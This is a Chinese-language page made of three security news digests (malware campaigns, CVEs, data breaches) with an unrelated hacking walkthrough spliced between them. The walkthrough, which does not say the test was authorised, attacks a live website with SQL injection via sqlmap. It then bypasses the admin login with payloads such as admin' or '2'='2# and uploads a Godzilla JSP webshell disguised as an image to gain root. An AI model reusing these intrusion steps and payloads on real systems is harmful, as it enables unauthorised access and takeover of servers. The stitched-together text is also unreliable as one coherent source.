1、DarkGate恶意软件从AutoIt脚本转向AutoHotkey机制 https://www.trellix.com/blogs/research/darkgate-again-but-improved/ 涉及DarkGate恶意软件即服务(MaaS)操作的网络攻击已从AutoIt脚本转向AutoHotkey机制来进行最后阶段。DarkGate是一种功能齐全的远程访问木马，配备命令和控制和rootkit功能，并包含用于凭证盗窃、键盘记录、屏幕捕获和远程桌面的各种模块。DarkGate活动往往适应得非常快，修改不同的组件以试图避开安全解决方案。这是研究人员第一次发现DarkGate使用不太常见的脚本解释器AutoHotKey来启动DarkGate。 2、研究人员发现针对Gulp用户传播远控的npm软件包 https://blog.phylum.io/sophisticated-rat-shell-targeting-gulp-projects-on-npm/ 网络安全研究人员发现了一个上传到npm包注册表的新可疑包，该包旨在向受感染的系统投放远程访问木马(RAT)。有问题的软件包是glup-debugger-log，它伪装成“gulp和gulp插件的记录器”，针对gulp工具包的用户。迄今为止，它已被下载175次。该软件配备了两个混淆文件，它们协同工作以部署恶意负载。其中一个脚本充当初始植入程序，为恶意软件攻击活动做好准备，如果目标机器满足某些要求，就会感染该机器，然后下载其他恶意软件组件； 3、CISA警告Oracle WebLogic存在被利用的安全漏洞 https://www.cisa.gov/known-exploited-vulnerabilities-catalog 美国网络安全和基础设施安全局(CISA)周四将影响Oracle WebLogic Server的安全漏洞添加到已知利用漏洞(KEV)目录中，并指出有证据表明存在主动利用。该问题被标记为CVE-2017-3506（CVSS评分：7.4），涉及操作系统命令注入漏洞，可被利用来获取对易受攻击的服务器的未授权访问并完全控制。CISA表示：“Fusion Middleware套件中的一款产品Oracle WebLogic Server存在操作系统命令注入漏洞，允许攻击者通过包含恶意 4、微软官方X账户在Roaring Kitty加密货币骗局中被劫持 https://www.bleepingcomputer.com/news/security/microsoft-indias-x-account-hijacked-in-roaring-kitty-crypto-scam-to-push-wallet-drainers/ 拥有超过211000名关注者的微软印度公司官方Twitter账号被加密货币骗子劫持，并冒充著名的模因股票交易员Keith Gill使用的用户名Roaring Kitty。微软印度的X账户作为该平台上官方认证的组织，拥有黄金支票，这使得劫持者的帖子更具合法性。威胁行为者利用Gill最近的复出来引诱潜在受害者，并用加密货币钱包 5、债务催收机构FBCS将数据泄露涉及人数增加到320万 https://www.securityweek.com/number-of-people-impacted-by-fbcs-data-breach-increases-to-3-2-million/ 债务催收机构金融商业和消费者解决方案(FBCS)表示，2月份发生的数据泄露事件已影响到320多万人。FBCS是美国一家全国性持牌债务催收机构，专门负责收取消费信贷、医疗保健、商业、汽车贷款和租赁、学生贷款和公用事业领域的未付债务。4月底，该公司报告称，2024年2月14日发生的一次数据泄露事件中，美国约有190万人的敏感个人信息遭到泄露。目前该公司已向缅因州检察长办公室提交了补充通知，称受影响 6、Atlassian Confluence RCE 漏洞详情披露 https://www.securityweek.com/details-of-atlassian-confluence-rce-vulnerability-disclosed/ SonicWall 分享了有关最近解决的 Confluence 高严重性远程代码执行漏洞的技术细节。 7、新型 V3B 网络钓鱼工具包瞄准 54 家欧洲银行的客户 https://www.bleepingcomputer.com/news/security/new-v3b-phishing-kit-targets-customers-of-54-european-banks/ 网络犯罪分子正在 Telegram 上推广一种名为“V3B”的新型网络钓鱼工具包，目前该工具包的目标是爱尔兰、荷兰、芬兰、奥地利、德国、法国、比利时、希腊、卢森堡和意大利的 54 家主要金融机构的客户。该网络钓鱼工具包的价格在每月 130 至 450 美元之间，具体取决于购买的内容，具有高级混淆、本地化选项、OTP/TAN/2FA 支持、与受害者的实时聊天以及各种逃避机制。 8、电信巨头Frontier遭到勒索攻击，200 多万用户数据泄露 https://securityaffairs.com/164126/data-breach/ransomhub-gang-hacked-frontier-communications.html RansomHub 勒索软件组织声称窃取了美国电信公司 Frontier Communications 超过 200 万客户的信息。RansomHub 组织声称窃取了这家电信巨头的 5GB 数据。被盗数据包括姓名、电子邮件地址、社会保险号、信用、分数、出生日期和电话号码。 9、全球刑警展开“终结行动”，打击了多个僵尸网络 https://www.ithome.com/0/772/576.htm 欧洲刑警组织 Europol 近日联合美国、英国等数十国家地区刑警面向几款臭名昭著的网络僵尸病毒展开“终结行动（Operation Endgame）”打击，在 5 月 27 日至 29 日期间关闭超过 100 台服务器、扣押了 2000 多个域名，同时逮捕了 4 名嫌犯，并对 8 名嫌犯展开全球通缉。 10、Hugging Face 称黑客窃取了Spaces平台的身份验证令牌 https://huggingface.co/blog/space-secrets-disclosure Hugging Face 官方博客披露黑客窃取了其 Spaces 平台的身份验证令牌。Hugging Face 表示已撤销泄露的身份验证令牌，并发送邮件通知受影响的用户。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Andariel组织使用新型Dora RAT恶意软件攻击韩国机构 https://asec.ahnlab.com/en/66088/ 与朝鲜有关的威胁行为者Andariel在其针对韩国教育机构、制造公司和建筑企业的攻击中，使用了一种新的基于Golang的后门程序Dora RAT。这些攻击使用了键盘记录器、信息窃取工具和代理工具等恶意软件，可能用于控制并窃取感染系统中的数据。这些攻击的特点是利用一个存在漏洞的Apache Tomcat服务器来分发恶意软件。韩国的这家网络安全公司指出，该系统运行的是2013年版本的Apache Tomcat，容易受到多种漏洞的攻击。Andariel也被称为Nicket Hyatt、Onyx Sleet和Silent Choll 2、APT28使用HeadLace恶意软件和凭证收集工具攻击欧洲 https://www.recordedfuture.com/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp 俄罗斯GRU支持的威胁行为者APT28被指控在一系列攻击活动中，使用HeadLace恶意软件和凭证收集网页，针对欧洲的网络进行攻击。APT28，也被称为BlueDelta、Fancy Bear、Forest Blizzard、FROZENLAKE、Iron Twilight、ITG05、Pawn Storm、Sednit、Sofacy和TA422，是与俄罗斯战略军事情报单位GR 3、攻击者利用伪造浏览器更新传播BitRAT和Lumma恶意软件 https://www.esentire.com/blog/fake-browser-updates-delivering-bitrat-and-lumma-stealer 假浏览器更新正在用于传播远程访问木马（RATs）和信息窃取恶意软件，如BitRAT和Lumma Stealer（又名LummaC2）。假浏览器更新已经导致了众多恶意软件感染，包括著名的SocGholish恶意软件。在2024年4月，我们观察到FakeBat通过类似的假更新机制进行分发。攻击链开始于潜在目标访问一个被植入JavaScript代码的陷阱网站，这些代码旨在将用户重定向到一个伪造的浏览器更新页面（“chatgpt 4、Pumpkin Eclipse网络攻击导致美国60余万路由器断网 https://blog.lumen.com/the-pumpkin-eclipse/ 超过60万台小型办公室/家庭办公室（SOHO）路由器因神秘的网络攻击而被破坏并离线，导致用户无法访问互联网。这一神秘事件发生在2023年10月25日至27日之间，影响了美国的一家互联网服务提供商（ISP），研究人员命名为“南瓜日食”（Pumpkin Eclipse）。此次攻击特别影响了ISP发行的三款路由器型号：ActionTec T3200、ActionTec T3260和Sagemcom。这一事件发生在10月25日至27日的72小时内，使受感染的设备永久无法使用，并需要进行硬件更换。此次断网事件非常重 5、研究人员警告互联网暴露的OT设备遭遇的网络攻击激增 https://www.microsoft.com/en-us/security/blog/2024/05/30/exposed-and-vulnerable-recent-attacks-highlight-critical-need-to-protect-internet-exposed-ot-devices/ 微软强调了保护互联网暴露的运营技术（OT）设备的重要性，因为自2023年末以来，针对这些环境的网络攻击激增。这些针对OT设备的反复攻击强调了提高OT设备安全姿态的关键需求，并防止关键系统成为容易攻击的目标。该公司指出，对OT系统的网络攻击可能使恶意行为者篡改用于工业过程的关键参数 6、Check Point VPN 零日漏洞PoC 代码已经公开 https://www.securityweek.com/poc-published-for-exploited-check-point-vpn-vulnerability/ 针对影响 Check Point 安全网关多个迭代的、被积极利用的零日漏洞，概念验证 (PoC) 代码已经发布。该问题于 5 月 27 日披露，编号为 CVE-2024-24919（CVSS 评分为 8.6），被描述为启用了 IPSec VPN 或移动访问网关中的任意文件读取问题。 7、Apache Log4j2 严重漏洞仍威胁全球金融 https://securityaffairs.com/163984/hacking/critical-apache-log4j2-flaw-still-threatens-global-finance.html 尽管严重的 Apache Log4j2 漏洞 (CVE-2021-44832) 是在一年多前发现并修补的，但它仍然对全球金融业构成重大威胁。 8、普华永道数据遭泄露，海量内部文件曝光 https://www.secrss.com/articles/66638 “四大”会计师事务所之一普华永道的18900份内部档案被公开，文件大小共222GB。泄露的文件包括客户评审文件、人力资源文件和员工文件。 9、英国BBC数据泄露，现任和前任雇员均受影响 https://www.bleepingcomputer.com/news/security/bbc-suffers-data-breach-impacting-current-former-employees/ 英国广播公司（BBC）披露了 5 月 21 日发生的一起数据安全事件，该事件涉及未经授权访问托管在云服务上的文件，从而泄露了 BBC 养老金计划成员的个人信息。 10、59% 公共部门的应用程序长期存在安全漏洞 https://www.helpnetsecurity.com/2024/05/30/public-sector-applications-security-debt/ Veracode 在一份报告中，详细调查分析了全球超过 25 个国家的公共部门组织，最终发现 59% 的公共部门应用程序存在安全漏洞（超过一年仍未修复的安全漏洞）。值得一提的是，把调查对象扩展到社会各个行业面上，这一比例为 42%。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

0x01 前台SQL注入 漏洞原理 SQL 注入漏洞的原理是应用程序没有对用户输入进行充分的验证和过滤，导致攻击者可以在输入框中插入恶意的 SQL 代码。当应用程序将用户输入的数据拼接到 SQL 查询语句中时，攻击者插入的恶意代码也会被执行，从而绕过身份验证和访问控制，直接访问或修改数据库中的数据。 1、查找注入点。 如果要对一个网站进行SQL注入攻击，首先就需要找到存在SQL注入漏洞的地方，也就是寻找所谓的注入点。可能的SQL注入点一般存在于登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。 交互点一般是搜索栏、留言版、登入/注册页面、以及最利于观察的搜索栏的地址如果类似于http//xxxxxx/index.phpid=1这种很大程度存在注入当然有些注入点不会这么一眼看出会有些比较复杂例如http://xxxxxx/index.phpx=home&c=View&a=index&aid=9&&& 这样的地址其实也可能存在注入。 如果应用程序未对用户输入进行充分的验证和过滤，就容易受到 SQL [注入攻击] 根据如上所述先去查看和数据库有交互点的地方，一般先去找搜索框，特别是这种可以查询年份和编号的地方，和用户数据交互的可能性最大。 使用Wappalyzer简单看一下网站的框架和使用的语言 经过查看找到一处与数据库有数据交互的搜索编号的搜索框 可以直接输入一个单引号看看有没有报错，sql注入加单引号的原因是为了让sql语句发生错误，从而得知其有没有过滤措施 芜湖，直接爆SQL语句错误。。。 返回前面的搜索框输入' and sleep(10)# 还是直接报错，没什么waf防护拦截。 既然你这么脆弱，我就不客气了，直接丢sqlmap一把梭。。。。。 2、测试 在搜索框随便输入一个简单的数据，使用yakit工具拦截等一下点击搜索发送的数据包。 拦截的数据包： 注入点在mz17Condition.searchCaseId=这个参数，在这个参数后面加上*号，让等一下使用sqlmap工具测试的时候直接测试这个测试，要不然会从头开始每一个参数都会测试，浪费时间，把数据包复制到txt文件里面。 使用sqlmap工具测试txt文件里面的数据sqlmap命令： --random-agent 随机使用HTTP用户代理头。 --level 分为1-5，默认为1，检查cookie至少为2，检查User-Agent等级至少为3，5级包含的payload最多，会自动破解出Cookie、XFF等头部注入，对应的速度也会比较慢。 --risk 等级为0-3，默认为1，会检测大部分的测试语句，等级为2时会增加基于事件的测试语句，等级为3会增加or语句的SQL注入测试 sqlmap.py -r .\9.txt --random-agent --level 5 --risk 3 果然直接跑出来了，注入类型有布尔和报错，后端还是IBM DB2数据库，第一次遇见。。。。 话不多说直接跑库，看看可以获取到后台的密码sqlmap.py -r .\9.txt --random-agent --level 5 --risk 3 --dbs 只跑出了一个库，看提示，感觉是当前注入的用户权限不够大sqlmap.py -r .\9.txt --random-agent --level 5 --risk 3 --is-dba 后面跑了一下爆出来的数据库，里面没啥有用的信息。。。。拿不了shell继续测试别的地方 0x02 万能密码后台登录 前面的前台SQL注入没什么大用拿不了shell以后，继续测试别的漏洞，前台基本没什么东西，看向后台。 1、测试 使用dirsearch工具扫描网站目录，扫描出网站后台。 访问后台url 按照惯例后台登录必试弱口令admin/123456、admin/12345、admin/admin、admin/admin888、system/123456。。。。都试了一遍没成功，看见没验证码又不限制登录错误次数，直接去跑字典，结果。。。。没爆出来。。。。 看向用户注册，鼓捣了一阵子发现根本就是摆设，填写信息点击注册没反应，抓包查看发现根本没有数据包发送出去，鸡肋。。。。 在一筹莫展的时候，突然想到前台有SQL注入漏洞，后台会不会也有呢。。。。 原理 万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证，此时程序所用用户输入的数据都合法的，所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的，非法入侵者正是利用这一特点来进行非法登录的。 当我们在这些语句中添加一些参数时，就可以去数据库中查询账号和密码。 添加参数后，语句差不多是这样： select * from user where username='a' or true #' and password='pass' 其中，#在SQL中是注释符，注释符后面的内容不起作用。 所以，实际上后台得到的有效代码是这样的： select * from user where username='a' or true 其中or true 会使SQL语句恒成立，从而查询出数据库中的所有账号和密码，从而使我们成功登录。 除了 # 以外， -- 也是SQL中的注释符，但SQL的语法格式规定--和后面的注释内容必须间隔一个空格。 所以拼接到语句中大概是这样的： select * from user where username='a' or true -- a' and password='pass' 也就是说：a' or true -- a经过SQL的转化后，结果等价于 a’ or true #。 SQL中规定，非布尔类型的数据参与比较运算时，会转化为布尔类型再参与运算。比如 or 1 或者 or 1=1 ，会转化为布尔类型的 true 再参与 or 的比较运算，也就是变成 or true ，同样能使条件恒成立，从而登录成功 简单来讲就是：a' or 1 # 或者 a' or 1=1 # 等价于 a' or true #。 当我们在登录界面输入 【万能密码】 比如 admin’ # 以后，后端会将我们输入的参数拼接到SQL中，大概是下面这样 select * from user where username='admin' #' and password='pass' 由于 # 在SQL中是注释符，注释符后面的内容不起作用，所以真正执行的SQL大概是下面这样 select * from user where username='admin' SQL只会在数据库中查询用户名，而不是同时查询用户名和密码，这就意味着，只要用户名正确，就可以登录成功。 继续测试 使用万能密码继续测试admin' or 1=1--+ 点击登录以后会跳转到这错误页面，好像有戏！ 更换一个万能密码payload：admin' or 1=1# 芜湖报错！！！根据报错提示尝试闭合 尝试万能密码闭合能不能直接进入后台，使用自己收藏的万能密码txt去Fuzz用户名 抓取输入登录框用户名的数据包 这里使用burp suite工具继续爆破 加入自己收集的万能密码payload，进行测试 芜湖302跳转了应该是成功了使用payload测试看看 最终构造万能密码payload：admin' or '2'='2# 进入后台！！！，登录的用户为管理员用户！！！ 0x03 后台getshell 1、测试 进了后台而且还是管理员的账号，就好办了，查找上传点，结果一番点点点、看看看，在网站信息维护找到上传点。 点击添加 填写好状态编号和数量 设置主页新闻图片的位置选择文件 设置一张图片码 使用Webshell_Generate生成哥斯拉jsp的webshell 生成名为ceshijsp.jpg的哥斯拉码 选择这个cheshijsp.jpg的图片 使用burp suite工具拦截点击确定时候发送的数据包，把后缀为jpg改为jsp 修改后缀为jpg以后，发送修改好的数据包，取消拦截。 因为发送出去的数据包试没有回显回来上传webshell jsp码的地址，访问首页，新闻动态的第一张图片就是刚刚上传的jsp码，右键打开新的标签可以看到完整的图片地址。 得到webshell地址 使用哥斯连接 root最高权限！！！ 0x04 总结 要多做尝试不要气馁。。。。

1、攻击者滥用Stack Overflow网站推广恶意Python包 https://www.sonatype.com/blog/pypi-crypto-stealer-targets-windows-users-revives-malware-campaign 网络安全研究人员警告称，Python Package Index (PyPI) 存储库中发现了一个新的恶意Python包，该包作为更大范围的加密货币盗窃活动的一部分。该恶意包名为 pytoileur，截至撰写本文时已被下载316次。有趣的是，包的作者名为PhilipsPY，在PyPI维护者于2024年5月28日撤下之前的版本（1.0.1）后，上传了具有相同功能的新版本（1.0.2）。恶意代码嵌入在包的 2、LilacSquid组织针对IT和能源以及制药行业发起网络攻击 https://blog.talosintelligence.com/lilacsquid/ 一个名为LilacSquid的前所未有的网络间谍威胁行为者被发现自2021年以来一直对美国、欧洲和亚洲的各个行业进行有针对性的攻击，目的是窃取数据。研究人员在今天发布的一份新技术报告中表示：“这次活动旨在建立对受害者组织的长期访问，以便LilacSquid能够将感兴趣的数据转移到攻击者控制的服务器上。”受攻击的目标包括在美国为研究和工业部门开发软件的信息技术组织、欧洲的能源公司以及亚洲的制药行业，显示出广泛的受害者分布。攻击链已知利用公开的漏洞来入侵面向互联网的应用服务器，或使用被攻陷的远程桌面协议 3、FlyingYeti利用WinRAR漏洞在乌克兰传播COOKBOX恶意软件 https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine 研究人员已经采取措施破坏一个由俄罗斯支持的名为FlyingYeti的威胁行为者针对乌克兰长达一个月的网络钓鱼活动。研究人员在今天发布的一份新报告中表示：“FlyingYeti活动利用人们对失去住房和公共设施访问的担忧，通过债务主题诱饵引诱目标打开恶意文件。”一旦打开，这些文件将导致感染名为COOKBOX的PowerShell恶意软件，使FlyingYeti能够支持后续目标，例如安装其他负载并控制受害者的系统。FlyingYeti是该网络基础 4、5.6亿Ticketmaster客户的数据在疑似泄露后被出售 https://www.bleepingcomputer.com/news/security/data-of-560-million-ticketmaster-customers-for-sale-after-alleged-breach/ 一名被称为ShinyHunters的威胁行为者在最近复活的BreachForums黑客论坛上以50万美元的价格出售他们声称是5.6亿Ticketmaster客户的个人和财务信息。据称被盗的数据库最初在俄罗斯黑客论坛Exploit上出售，据称包含1.3TB的数据和客户的完整详细信息（即姓名、家庭和电子邮件地址、电话号码）、票务销售、订单和活动信息。这些数据 5、RedTail挖矿恶意软件利用Palo Alto防火墙漏洞发起攻击 https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit RedTail加密货币挖矿恶意软件的背后威胁行为者已将最近披露的影响Palo Alto Networks防火墙的安全漏洞添加到其利用武器库中。该恶意软件的工具包中增加了PAN-OS漏洞，并且恶意软件本身也进行了更新，现已包含新的反分析技术。攻击者通过使用私有加密货币挖矿池来更好地控制挖矿结果，尽管这增加了操作和财务成本。Akamai发现的感染序列利用了一个现已修补的PAN-OS漏洞（CVE-2024-3400，CV 6、攻击者利用种子网站上的盗版微软Office版本以传播恶意软件 https://asec.ahnlab.com/en/66017/ 网络犯罪分子通过在种子网站上推广的盗版微软Office版本向用户传播各种恶意软件。向用户传播的恶意软件包括远程访问木马（RAT）、加密货币矿工、恶意软件下载器、代理工具和反AV程序。研究人员发现，攻击者使用多种诱饵，包括微软Office、Windows和在韩国流行的Hangul文字处理器。这个破解的微软Office安装程序具有精心设计的界面，让用户可以选择要安装的版本、语言，以及是否使用32位或64位版本。 7、研究人员披露Pumpkin Eclipse僵尸网络在2023年的攻击活动 https://blog.lumen.com/the-pumpkin-eclipse/ 一个名为“Pumpkin Eclipse”的恶意软件僵尸网络在2023年进行了一次神秘的破坏性事件，摧毁了60万台办公/家庭办公（SOHO）互联网路由器，导致客户的互联网连接中断。研究人员观察到，这次事件在2023年10月25日至10月27日期间，导致美国中西部多个州的互联网接入中断。这使得受感染设备的所有者别无选择，只能更换路由器。尽管此次事件规模庞大，但影响范围集中，仅影响了一家互联网服务提供商（ISP）和该公司使用的三种型号的路由器：ActionTec T3200s、ActionTec T3260s 8、微软警告客户称Windows 11预览更新可能导致任务栏崩溃 https://www.bleepingcomputer.com/news/microsoft/microsoft-may-2024-kb5037959-windows-11-preview-update-causes-taskbar-crashes/ 微软周四警告客户，Windows 11的2024年5月非安全预览更新导致任务栏崩溃和故障。本月的KB5037853可选更新于周四发布，修复了多个文件资源管理器问题和其他32个问题。今天，在推出这一累积更新的一天后，雷德蒙德在KB5037853支持文档中添加了一个新的已知问题，确认Windows 11 22H2和23H2用户可能会遇到任务栏问题 9、Cooler Master确认数据泄露事件导致客户信息被盗取 https://www.bleepingcomputer.com/news/security/cooler-master-confirms-customer-info-stolen-in-data-breach/ 知名电脑硬件制造商Cooler Master确认其于5月19日遭遇数据泄露，导致客户数据被窃取。Cooler Master是一个知名的电脑硬件制造商，产品涵盖散热设备、电脑机箱、电源和其他外设。一名自称'Ghostr'的攻击者称，他们在5月18日攻破了该公司的Fanzone网站，并下载了相关数据库。Cooler Master的Fanzone网站用于产品保修注册、申请RMA或提交支持 10、Snowflake遭遇数据泄露影响全球数百家知名企业 https://www.bleepingcomputer.com/news/security/snowflake-account-hacks-linked-to-santander-ticketmaster-breaches/ 一个威胁组织声称在攻击云存储公司Snowflake的一名员工账户后窃取了该公司的用户数据。然而，Snowflake反驳了这些说法，称最近的入侵是由安全措施不力的客户账户造成的。据网络安全公司HudsonRock称，威胁行为者还使用Snowflake的云存储服务获取了其他知名公司的数据，包括Anheuser-Busch、StateFarm、三菱、Progressive、 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。